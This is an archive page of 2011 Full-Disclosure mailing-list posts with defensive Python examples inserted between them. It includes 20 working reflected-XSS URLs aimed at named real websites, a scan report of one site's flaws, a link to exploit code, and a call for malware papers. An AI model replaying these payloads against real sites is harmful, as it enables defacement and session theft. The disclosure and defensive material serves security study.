Re: [Full-disclosure] Cyberwar between Israel and Turkish Hacker

2011-09-06 Thread Valdis . Kletnieks
On Wed, 07 Sep 2011 04:55:36 +0530, Mohit Kumar said:

> Turkish hacker "*TurkGuvenligi*" hijacked some 350 Israeli websites on
> Sunday evening

> "*The hack represents a 10%-15% spike compared to the average number of
> daily hacks of Israeli websites*,"

Hmm... if 350 is a 10% spike, then the base value must be 3500 hacks *per day*
of Israeli websites.  I found a reference for there being 81,743 *.il domains
as of a few days ago:

http://www.webhosting.info/registries/country_stats/IL

Now admittedly, there's not a one-to-one correspondence between domains
and websites.  However, 3.5k hacks per day for 81K domains works out to
an *average* rate of every domain getting hacked at least once a month.
And remember kiddies - if out of 10 domains, 9 manage to fly under the wire
and not draw hacker's attention, that 10th domain needs to get whacked over
twice a week to keep that average up. ;)

One also has to wonder if all 350 sites were customers of the same DNS provider
and only one DNS server got hit.  Of course, in that case, the *real* story may
well have been "hacker nails DNS server, redirects everybody to his hack site
with a wildcard, only 350 out of 20,000 domains actually notice anything
happened".

Or it was actually "Hacker nails DNS server for 7 or 8 high-eyeballs sites,
happens to nail 20,000 other domains on the same DNS server, of which 350
happened to be .il domains, and instead of the obvious "World Hackers Day"
interpretation, somebody concluded the fact that 350 were .il domains meant it
was "cyberwar against Israel". I wonder if there were 18.000 .com addresses
involved too, if that would make it "cyberwar against the US".

/me suspects that it was "cyberwar against The Man, Dude" and 350 .il domains
were just accidental collateral damage.  But that doesn't make as good a 
narrative.

Fortunately, narratives are almost never connected to reality anyhow.

Just sayin' ;)


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Malcon 2011 - Call for Papers

2011-09-06 Thread root
You might as well organize the conference inside a prison and save the
police some time.

On 09/06/2011 08:26 PM, Mohit Kumar wrote:
> Malcon is the world's first platform bringing together Malware and
> Information Security Researchers from across the globe to share key research
> insights into building and containment of the next generation malwares.
> 
> *Call for Papers:*
> Malcon 2011 is looking for new techniques, tool releases, unique research
> and about anything that’s breath-taking, related to Malwares. The papers and
> research work could be under any of the broad categories mentioned below:
> 
> *Hacking Tools: *Phishing Kits, code that aids any malware or malicious
> activity is welcome.
> *Malwares:* Rootkit, Trojan, Botnet, Bootkit, Virus, Keylogger, Virtual
> Machine based Malware, Mobile OS Based Malware (Android, Symbian, IPhone
> etc.)
> *Malware creation tools:* Toolkits to create any kind of malware
> *Web based malwares: *Web-Shells, Browser Runtime Malwares (Javascript,
> Flash)
> *Malware Infection and propagation methodologies:* Emerging Infection
> techniques, Intelligent target enumeration techniques, Web Based, Network
> Based, Cross-Platform Infection
> *Malware self-defence: *AV Detection Techniques (Polymorphism, Metamorphism,
> VM, Injection, System Hooks, Memory Hijacking),  Antivirus Exploitation
> Techniques, Anti-Reversing Techniques, Anti-Debugging Techniques, Techniques
> to bypass security mechanisms (AV, Anti-Malware Products), Secure Malware
> Communication (Command Control)
> 
> *Original Read at : The Hacker News ~
> http://thehackernews.com/2011/09/malcon-2011-call-for-papers.html*



Re: [Full-disclosure] 20 Famous websites vulnerable to Cross Site Scripting (XSS) Attack

2011-09-06 Thread GloW - XD
Very nice :)
Impressive for XSS (for once).
xd




On 7 September 2011 09:28, Mohit Kumar  wrote:

> Most of the biggest and most famous sites are found to be vulnerable to XSS
> attacks. Cross-site scripting (XSS) is a type of computer security
> vulnerability typically found in web applications which allow code injection
> by malicious web users into the web pages viewed by other users. Examples of
> such code include HTML code and client-side scripts. An exploited cross-site
> scripting vulnerability can be used by attackers to bypass access controls
> such as the same origin policy. Recently, vulnerabilities of this kind have
> been exploited to craft powerful phishing attacks and browser exploits.
> Cross-site scripting was originally referred to as CSS, although this usage
> has been largely discontinued.
>
> A hacker with the code name "*Invectus*" lists some such famous sites with
> XSS vulnerabilities, as listed below:
> *1.)*
> http://video.state.gov/en/search/img-srchttp-i55tinypiccom-witu7dpng-height650-width1000/Ij48aW1nIHNyYz0iaHR0cDovL2k1NS50aW55cGljLmNvbS93aXR1N2QucG5nIiBoZWlnaHQ9IjY1MCIgd2lkdGg9IjEwMDAiPg%3D%3D
>
> *2.)*
> http://www.telegraph.co.uk/search/?queryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E
>
> *3.)*
> http://www.dsm.com/en_US/cworld/public/home/pages/searchResults.jsp?search-site=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&noMimimumKeywords=false
>
> *4.) *
> http://www.schools.nsw.edu.au/psearch/ext/?refine=new&QueryText=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&Go.x=29&Go.y=25&Go=submit
>
> *5.) *
> http://thetablet.co.uk/search.php?q=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E
>
> *6.)*
> http://www.scstatehouse.gov/cgi-bin/query.exe?first=FIRST&querytext=&category=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E
>
> *7.)*
> http://www.highered.tafensw.edu.au/vsearch/tafehigheredu/?QueryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E
>
> *8.)*
> http://www.mcdonalds.com/content/us/en/search/search_results.html?queryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E
>
> *9.)*
> http://www.watersportholland.nl/cgi-bin/watersportholland/zoeken.cgi?search=Vera&query=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E
>
> *10.)*
> http://www.gpo.gov/fdsys/search/searchresults.action?st=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E
>
> *11.)*
> http://www.networkcomputing.com/sitesearch?sort=publishDate+desc&queryText=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E
>
> *12.)*
> http://www.unc.edu/search/index.htm?q=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&cx=014532668884084418890%3Ajyc_iub1byy&cof=FORID%3A10&ie=UTF-8&hq=inurl%3Adevnet.unc.edu
>
> *13.) *
> http://cugir.mannlib.cornell.edu/search?querytext=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E
>
> *14.)*
> http://ieeexplore.ieee.org./search/freesearchresult.jsp?newsearch=true&queryText=.QT.%3E%3Cimg+src.EQ..QT.http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png.QT.+height.EQ..QT.650.QT.+width.EQ..QT.1000.QT.%3E&x=58&y=13
>
> *15.)*
> http://vivo-vis.cns.iu.edu/vivo1/search?querytext=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E
>
> *16.)*
> http://google.nyu.edu/search?site=NYUWeb_Main&client=NYUWeb_Main&output=xml_no_dtd&proxyreload=1&proxystylesheet=stern_frontend&sitesearch=www.stern.nyu.edu&q=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&x=8&y=6
>
> *17.)*
> http://ofa.fas.harvard.edu/cal/search.php?q=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E
>
> *18.)*
> http://www.uidaho.edu/search?q=%22%3E%3Cscript%3EInvectus%3C/script%3E&cof=FORID:9&cref=http://www.uidaho.edu/search?xml=1&ticks=634508915004972966
>
> *19.)*
> https://vivo.ufl.edu/search?flag1=1&querytext=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E
>
> *20.)*
> http://energy.gov/search/site/%22%3E%3Cimg%20src%3D%22http%3A//i55.tinypic.com/witu7d.png%22%20height%3D%22650%22%20width%3D%221000%22%3E
>
> Original Post ;  : The Hacker News ~
> http://thehackernews.com/2011/09/20-famous-websites-vulnerable-to-cross.html
> --
> *Regards,*
> *Owner,*
> *The Hacker News *
> *Truth is the most Powerful weapon against Injustice.*

[Full-disclosure] Malcon 2011 - Call for Papers

2011-09-06 Thread Mohit Kumar
Malcon is the world's first platform bringing together Malware and
Information Security Researchers from across the globe to share key research
insights into building and containment of the next generation malwares.

*Call for Papers:*
Malcon 2011 is looking for new techniques, tool releases, unique research
and about anything that’s breath-taking, related to Malwares. The papers and
research work could be under any of the broad categories mentioned below:

*Hacking Tools: *Phishing Kits, code that aids any malware or malicious
activity is welcome.
*Malwares:* Rootkit, Trojan, Botnet, Bootkit, Virus, Keylogger, Virtual
Machine based Malware, Mobile OS Based Malware (Android, Symbian, IPhone
etc.)
*Malware creation tools:* Toolkits to create any kind of malware
*Web based malwares: *Web-Shells, Browser Runtime Malwares (Javascript,
Flash)
*Malware Infection and propagation methodologies:* Emerging Infection
techniques, Intelligent target enumeration techniques, Web Based, Network
Based, Cross-Platform Infection
*Malware self-defence: *AV Detection Techniques (Polymorphism, Metamorphism,
VM, Injection, System Hooks, Memory Hijacking),  Antivirus Exploitation
Techniques, Anti-Reversing Techniques, Anti-Debugging Techniques, Techniques
to bypass security mechanisms (AV, Anti-Malware Products), Secure Malware
Communication (Command Control)

*Original Read at : The Hacker News ~
http://thehackernews.com/2011/09/malcon-2011-call-for-papers.html*

-- 
*Regards,*
*Owner,*
*The Hacker News *
*Truth is the most Powerful weapon against Injustice.*

[Full-disclosure] 20 Famous websites vulnerable to Cross Site Scripting (XSS) Attack

2011-09-06 Thread Mohit Kumar
Most of the biggest and most famous sites are found to be vulnerable to XSS
attacks. Cross-site scripting (XSS) is a type of computer security
vulnerability typically found in web applications which allow code injection
by malicious web users into the web pages viewed by other users. Examples of
such code include HTML code and client-side scripts. An exploited cross-site
scripting vulnerability can be used by attackers to bypass access controls
such as the same origin policy. Recently, vulnerabilities of this kind have
been exploited to craft powerful phishing attacks and browser exploits.
Cross-site scripting was originally referred to as CSS, although this usage
has been largely discontinued.

A hacker with the code name "*Invectus*" lists some such famous sites with
XSS vulnerabilities, as listed below:
*1.)*
http://video.state.gov/en/search/img-srchttp-i55tinypiccom-witu7dpng-height650-width1000/Ij48aW1nIHNyYz0iaHR0cDovL2k1NS50aW55cGljLmNvbS93aXR1N2QucG5nIiBoZWlnaHQ9IjY1MCIgd2lkdGg9IjEwMDAiPg%3D%3D

*2.)*
http://www.telegraph.co.uk/search/?queryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

*3.)*
http://www.dsm.com/en_US/cworld/public/home/pages/searchResults.jsp?search-site=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&noMimimumKeywords=false

*4.) *
http://www.schools.nsw.edu.au/psearch/ext/?refine=new&QueryText=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&Go.x=29&Go.y=25&Go=submit

*5.) *
http://thetablet.co.uk/search.php?q=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

*6.)*
http://www.scstatehouse.gov/cgi-bin/query.exe?first=FIRST&querytext=&category=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

*7.)*
http://www.highered.tafensw.edu.au/vsearch/tafehigheredu/?QueryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

*8.)*
http://www.mcdonalds.com/content/us/en/search/search_results.html?queryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

*9.)*
http://www.watersportholland.nl/cgi-bin/watersportholland/zoeken.cgi?search=Vera&query=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E

*10.)*
http://www.gpo.gov/fdsys/search/searchresults.action?st=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

*11.)*
http://www.networkcomputing.com/sitesearch?sort=publishDate+desc&queryText=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E

*12.)*
http://www.unc.edu/search/index.htm?q=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&cx=014532668884084418890%3Ajyc_iub1byy&cof=FORID%3A10&ie=UTF-8&hq=inurl%3Adevnet.unc.edu

*13.) *
http://cugir.mannlib.cornell.edu/search?querytext=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

*14.)*
http://ieeexplore.ieee.org./search/freesearchresult.jsp?newsearch=true&queryText=.QT.%3E%3Cimg+src.EQ..QT.http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png.QT.+height.EQ..QT.650.QT.+width.EQ..QT.1000.QT.%3E&x=58&y=13

*15.)*
http://vivo-vis.cns.iu.edu/vivo1/search?querytext=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E

*16.)*
http://google.nyu.edu/search?site=NYUWeb_Main&client=NYUWeb_Main&output=xml_no_dtd&proxyreload=1&proxystylesheet=stern_frontend&sitesearch=www.stern.nyu.edu&q=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&x=8&y=6

*17.)*
http://ofa.fas.harvard.edu/cal/search.php?q=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

*18.)*
http://www.uidaho.edu/search?q=%22%3E%3Cscript%3EInvectus%3C/script%3E&cof=FORID:9&cref=http://www.uidaho.edu/search?xml=1&ticks=634508915004972966

*19.)*
https://vivo.ufl.edu/search?flag1=1&querytext=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E

*20.)*
http://energy.gov/search/site/%22%3E%3Cimg%20src%3D%22http%3A//i55.tinypic.com/witu7d.png%22%20height%3D%22650%22%20width%3D%221000%22%3E

Original Post ;  : The Hacker News ~
http://thehackernews.com/2011/09/20-famous-websites-vulnerable-to-cross.html
-- 
*Regards,*
*Owner,*
*The Hacker News *
*Truth is the most Powerful weapon against Injustice.*
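The twenty URLs above all carry the same reflected payload in a search parameter. As an added example written for this page (not code from the post or from any of the listed sites), the following Python shows the vulnerable attribute-interpolation pattern beside the output encoding that neutralises it; the sample host, the page template and the helper names are assumptions made here.

```python
"""Reflected XSS in a search box, shown beside the output encoding that stops it.

Added example written for this page; it is not code from the post or from any
of the listed sites. The payload is the one the listed URLs carry; the page
template, helper names and the sample host are assumptions made here.
"""
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed URLs with the same query-string shape as entries 2 and 18 in
# the post; the host is a placeholder, not one of the listed sites.
SAMPLE_URLS = [
    "http://search.example/search?queryText="
    "%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22"
    "%20height=%22650%22%20width=%221000%22%3E",
    "http://search.example/search?queryText=%22%3E%3Cscript%3EInvectus%3C/script%3E",
]


def search_term(url: str, param: str = "queryText") -> str:
    """Extract the user-controlled search term exactly as the server would see it."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get(param, [""])[0]


def render_unsafe(term: str) -> str:
    """Vulnerable pattern: the term is placed in an attribute without encoding,
    so a leading double quote closes the attribute and a '>' closes the tag."""
    return f'<input type="text" name="queryText" value="{term}">'


def render_safe(term: str) -> str:
    """Hardened pattern: encode for the HTML attribute context. quote=True is
    what turns the attribute-closing double quote into &quot;."""
    return f'<input type="text" name="queryText" value="{html.escape(term, quote=True)}">'


class _TagCounter(HTMLParser):
    """Collects start tags so a check can tell whether extra markup appeared."""

    def __init__(self) -> None:
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs) -> None:
        self.tags.append(tag)


def injected_tag_count(rendered: str) -> int:
    """Number of start tags beyond the single <input> the template itself emits."""
    counter = _TagCounter()
    counter.feed(rendered)
    counter.close()
    return len(counter.tags) - 1


if __name__ == "__main__":
    for url in SAMPLE_URLS:
        term = search_term(url)
        print("unsafe:", injected_tag_count(render_unsafe(term)), "injected tag(s)")
        print("safe:  ", injected_tag_count(render_safe(term)), "injected tag(s)")
```

The same rule applies to every search form in the list: the term must be encoded for the context it lands in (here an attribute value), and rejecting or stripping `<` on input is not a substitute, since the payload works through the closing double quote first.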

[Full-disclosure] Registry Decoder - Digital Forensics Tool

2011-09-06 Thread Mohit Kumar
Digital forensics deals with the analysis of artifacts on all types of
digital devices. One of the most prevalent analysis techniques performed is
that of the registry hives contained in Microsoft Windows operating systems.
Registry Decoder was developed with the purpose of providing a single tool
for the acquisition, analysis, and reporting of registry contents.
*Download Here* 
Original Read at : The Hacker News ~
http://thehackernews.com/2011/09/registry-decoder-digital-forensics-tool.html

-- 
*Regards,*
*Owner,*
*The Hacker News *
*Truth is the most Powerful weapon against Injustice.*

[Full-disclosure] Cyberwar between Israel and Turkish Hacker

2011-09-06 Thread Mohit Kumar
Turkish hacker "*TurkGuvenligi*" hijacked some 350 Israeli websites on
Sunday evening, launching a Domain Name System (DNS) attack on at least seven
high-profile websites including The Telegraph, Acer, National Geographic, UPS
and Vodafone as well. Visitors to some of the sites were diverted to a page
declaring it was "*World Hackers Day.*" Hackers calling themselves the
"*TurkGuvenligi group*" claimed the cyber-attack. "TurkGuvenligi" translates
as "*Turkish security.*"

"*The hack represents a 10%-15% spike compared to the average number of
daily hacks of Israeli websites*," Shai Blitzblau, head of Maglan-Computer
Warfare and Network Intelligence Labs, explained. Israel's military and
security establishment has invested significantly in cyber-warfare programs
in recent years and is considered one of the most advanced cyber-warfare
forces in the world, both in attack and defense modes. The Stuxnet virus that
brought systems at Iran's Bushehr nuclear reactor to a halt for over six
months is widely believed to have been the result of an Israeli
cyber-attack, although Israel has not admitted it.

Original Read at : The Hacker News ~
http://thehackernews.com/2011/09/cyberwar-between-israel-and-turkish.html
-- 
*Regards,*
*Owner,*
*The Hacker News *
*Truth is the most Powerful weapon against Injustice.*

[Full-disclosure] New Bugs released today on vl

2011-09-06 Thread resea...@vulnerability-lab.com
Hello,
some new publications with technical details from today. For PoC &
resources (pictures, logs & co) request -> resea...@vulnerability-lab.com

Skype 5.3.x 2.2.x 5.2.x - Persistent Software Vulnerability

http://www.vulnerability-lab.com/get_content.php?id=182

ME Firewall Analyzer v7.1 - Multiple Web Vulnerabilities

http://www.vulnerability-lab.com/get_content.php?id=264

ME Central Desktop v7.x - Multiple Persistent Vulnerabilities

http://www.vulnerability-lab.com/get_content.php?id=36

WebWatchBot Monitor v5.1.16 - Divide by Zero Vulnerability

http://www.vulnerability-lab.com/get_content.php?id=7

Best Regards,
DK - Vlab

-- 
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com


[Full-disclosure] Site Vulnerabilities: myexgf.com

2011-09-06 Thread George Girtsou
Site Vulnerabilities: myexgf.com

- Cross Site Scripting
This vulnerability affects /cgi-bin/te/o.cgi.

The impact of this vulnerability
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into
a vulnerable application to fool a user in order to gather data from them.
An attacker can steal the session cookie and take over the account,
impersonating the user. It is also possible to modify the content of the
page presented to the user.

Attack details
The GET variable s has been set to alert(507691789232).

- CRLF injection/HTTP response splitting
Affected items
/cgi-bin/te/o.cgi
The impact of this vulnerability
It is possible for a remote attacker to inject custom HTTP headers. For
example, an attacker can inject session cookies or HTML code. This may
lead to vulnerabilities like XSS (cross-site scripting) or session
fixation.

How to fix this vulnerability
You need to restrict CR(0x13) and LF(0x10) from the user input or properly
encode the output in order to prevent the injection of custom HTTP headers.


- SSL 2.0 deprecated protocol
Affected items
Server
The impact of this vulnerability
An attacker may be able to exploit these issues to conduct man-in-the-middle
attacks or decrypt communications between the affected service and clients.


How to fix this vulnerability
Disable SSL 2.0 and use SSL 3.0 or TLS 1.0 instead.

- SSL certificate invalid date
Affected items : Server
The impact of this vulnerability
The SSL certificate is not valid.

How to fix this vulnerability
Please verify your certificate validity period and, if necessary, regenerate the
certificate.

 - Cookie manipulation
The impact of this vulnerability
By exploiting this vulnerability, an attacker may conduct a session fixation
attack. In a session fixation attack, the attacker fixes the user's session
ID before the user even logs into the target server, thereby eliminating the
need to obtain the user's session ID afterwards.

How to fix this vulnerability
You need to filter the output in order to prevent the injection of custom
HTTP headers or META tags. Additionally, with each login the application
should provide a new session ID to the user.

- User credentials are sent in clear text
Affected items
/videos/user.php

- Apache server-status enabled
Affected items : Web Server
The impact of this vulnerability
Information disclosure.

How to fix this vulnerability
Disable this functionality if not required. Comment out the  section from httpd.conf.

- TRACE Method Enabled
Affected items
Web Server
The impact of this vulnerability
Attackers may abuse HTTP TRACE functionality to gain access to information
in HTTP headers such as cookies and authentication data.

How to fix this vulnerability
Disable TRACE Method on the web server.

- URL redirection
Affected items
/cgi-bin/at3/out.cgi
The impact of this vulnerability
A remote attacker can redirect users from your website to a specified URL.
This problem may assist an attacker in conducting phishing attacks, trojan
distribution or spamming.

How to fix this vulnerability
Your script should properly sanitize user input.

- Password type input with autocomplete enabled
Affected items
/videos/user.php

How to fix this vulnerability
The password autocomplete should be disabled in sensitive applications.
To disable autocomplete, you may use a code similar to:


-


List of open TCP ports
Description
There are 10 open TCP ports on the remote host.

Port 21 - [ftp] is open.



Port 25 - [smtp] is open.
Port banner:

220 plainstrider.amerinoc.com ESMTP Exim 4.69 Fri, 26 Aug 2011 18:00:20
-0700




Port 53 - [domain] is open.



Port 80 - [http] is open.
Port banner:

HTTP/1.1 200 OK
Date: Sat, 27 Aug 2011 01:02:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html




Port 110 - [pop3] is open.
Port banner:

+OK Dovecot DA ready.




Port 143 - [imap] is open.
Port banner:

* OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE
STARTTLS AUTH=PLAIN] Dovecot DA ready.




Port 443 - [https] is open.
Port banner:



400 Bad Request

Bad Request
Your browser sent a request that this server could not understand.
Reason: You're speaking plain HTTP to an SSL ...




Port 587 - [submission] is open.
Port banner:

220 plainstrider.amerinoc.com ESMTP Exim 4.69 Fri, 26 Aug 2011 18:16:26
-0700
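Three of the findings in the report above (CRLF injection / response splitting, URL redirection, and cookie manipulation leading to session fixation) share one fix pattern: validate or regenerate anything the client can influence before it reaches a header or a session. The following Python is an added example written for this page, not code from the post, from the scanner or from the scanned site; the header builder, redirect validator and session store are assumed application pieces.

```python
"""Defensive handling for three findings in the scan report above: CRLF /
HTTP response splitting, URL redirection, and cookie-based session fixation.

Added example written for this page; it is not code from the post, the
scanner, or the scanned site. The application pieces (a header builder, a
redirect validator, a session store) are assumptions made here.
"""
import secrets
from typing import Dict, FrozenSet, List, Optional, Tuple
from urllib.parse import urlsplit

# CR is byte 0x0d and LF is byte 0x0a; NUL is refused as well because some
# server stacks truncate a header value at it.
_FORBIDDEN_IN_HEADER = frozenset("\r\n\x00")


class HeaderInjection(ValueError):
    """Raised when a value could start a new header line."""


def safe_header_value(value: str) -> str:
    """Return the value unchanged, or raise if it contains CR, LF or NUL.
    Rejecting beats stripping: a stripped payload is still attacker-chosen."""
    if any(ch in _FORBIDDEN_IN_HEADER for ch in value):
        raise HeaderInjection("CR, LF or NUL in header value")
    return value


def rejects_header(value: str) -> bool:
    """True if safe_header_value refuses this value (convenient for checks)."""
    try:
        safe_header_value(value)
    except HeaderInjection:
        return True
    return False


def build_redirect_headers(location: str) -> List[Tuple[str, str]]:
    """Assemble response headers; the user-influenced one is validated first."""
    return [("Location", safe_header_value(location)),
            ("Content-Type", "text/html; charset=utf-8")]


def is_safe_redirect(target: str, allowed_hosts: FrozenSet[str]) -> bool:
    """Accept only local absolute paths or http(s) URLs on an allow-listed host.
    Scheme-relative '//host', backslash variants and non-http schemes are refused."""
    if not target or "\\" in target:
        return False
    if target.startswith("/"):
        return not target.startswith("//")
    parts = urlsplit(target)
    return parts.scheme in ("http", "https") and parts.hostname in allowed_hosts


class SessionStore:
    """Minimal server-side session store that never adopts a client-chosen ID."""

    def __init__(self) -> None:
        self._sessions: Dict[str, str] = {}

    def login(self, presented_sid: Optional[str], user: str) -> str:
        # Drop whatever pre-login session the client presented (it may have been
        # fixed by an attacker) and issue a fresh, unguessable ID.
        if presented_sid is not None:
            self._sessions.pop(presented_sid, None)
        new_sid = secrets.token_urlsafe(32)
        self._sessions[new_sid] = user
        return new_sid

    def user_for(self, sid: str) -> Optional[str]:
        return self._sessions.get(sid)


if __name__ == "__main__":
    hosts = frozenset({"www.example"})
    print(is_safe_redirect("/videos/user.php", hosts), is_safe_redirect("//evil.example/", hosts))
    print("rejected:", rejects_header("/ok\r\nSet-Cookie: sid=fixed"))
```

The redirect check deliberately allow-lists hosts rather than blocking known-bad ones, and the session store ignores the presented cookie value entirely at login, which is what removes the session fixation window regardless of how the cookie was planted.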


[Full-disclosure] Permutation Oriented Programming - Part 2.

2011-09-06 Thread Nelson Brito
Just to let you know that new example codes and a demonstration video are now
available.

The new example code is capable of bypassing a MS08-078 workaround recommended by
Microsoft, proving the power of a Permutation Oriented Programming approach.

- Video:
http://fnstenv.blogspot.com/2011/09/permutation-oriented-programming-2.html
- Codes:
http://permutation-oriented-programming.googlecode.com/files/MS08-078_XML_Island_Bypass.zip

For further details and extra documents/codes, please, refer to:
- http://code.google.com/p/permutation-oriented-programming/

Best regards.

PS: The vulnerability itself is not the key component, but the way it is
exploited is.

Nelson Brito
"Intellectus excedit, praestat tacere."
--
http://about.me/nbrito
8BD6 8CAD 41B7 19C5 EC04 C66D 70ED 23E4 E5AB 95EB

/* CIDR Calculator C Algorithm (32-bit unsigned arithmetic, host byte order) */
netmask   = ~(0xffffffffU >> cidr);       /* top `cidr` bits set, e.g. /24 -> 0xffffff00 */
hostid    = (1 << (32 - cidr)) - 2;       /* usable hosts: block size minus network and broadcast */
_1st_addr = (ntohl(addr) & netmask) + 1;  /* network address plus one */


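The three C lines in the signature above compute a netmask, a usable-host count and a first host address. The following Python, added here for this page and not Nelson Brito's code, carries the same arithmetic through with the edge cases handled (/0, /31 and /32, where the C shift or the "minus two" rule no longer applies) and cross-checks it against the standard library's ipaddress module; the function names are assumptions.

```python
"""The CIDR arithmetic from the signature above, carried through in Python with
the edge cases handled and cross-checked against the standard library.

Added example written for this page; it is not Nelson Brito's code. The three C
lines are the model; the function names here are assumptions.
"""
import ipaddress

MASK32 = 0xFFFFFFFF


def netmask(cidr: int) -> int:
    """Top `cidr` bits set. Equivalent to ~(0xffffffff >> cidr) in C for
    0 <= cidr <= 31; shifting a 32-bit value by 32 is undefined in C, so the
    mask is built with a left shift and a truncating AND instead."""
    if not 0 <= cidr <= 32:
        raise ValueError("prefix length must be between 0 and 32")
    return (MASK32 << (32 - cidr)) & MASK32


def block_size(cidr: int) -> int:
    """Number of addresses in the block (1 << (32 - cidr))."""
    netmask(cidr)  # validates the range
    return 1 << (32 - cidr)


def usable_hosts(cidr: int) -> int:
    """(1 << (32 - cidr)) - 2 as in the signature, except that /31 (RFC 3021
    point-to-point links) and /32 (a single host) reserve no network or
    broadcast address, so every address in the block is usable."""
    size = block_size(cidr)
    return size if cidr >= 31 else size - 2


def first_host(addr: str, cidr: int) -> str:
    """(addr & netmask) + 1 for ordinary prefixes; for /31 and /32 the network
    address itself is a host."""
    network = int(ipaddress.IPv4Address(addr)) & netmask(cidr)
    return str(ipaddress.IPv4Address(network if cidr >= 31 else network + 1))


def cross_check(addr: str, cidr: int) -> bool:
    """Compare the hand-rolled arithmetic with ipaddress; only call this for
    prefixes small enough to enumerate (hosts() is materialised)."""
    net = ipaddress.ip_network(f"{addr}/{cidr}", strict=False)
    hosts = list(net.hosts())
    return (int(net.netmask) == netmask(cidr)
            and len(hosts) == usable_hosts(cidr)
            and str(hosts[0]) == first_host(addr, cidr))


if __name__ == "__main__":
    for addr, cidr in (("192.168.1.77", 24), ("10.0.0.9", 30), ("10.0.0.1", 31), ("10.0.0.1", 32)):
        print(f"{addr}/{cidr}: mask={ipaddress.IPv4Address(netmask(cidr))} "
              f"hosts={usable_hosts(cidr)} first={first_host(addr, cidr)}")
```

The signature's formulas are right for the common /1 to /30 range; the edge cases are where a naive port goes wrong, and the cross-check is cheap insurance when such arithmetic ends up in a firewall rule generator or an allow-list.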


[Full-disclosure] GeoClassifieds Lite Multiple vulnerabilities

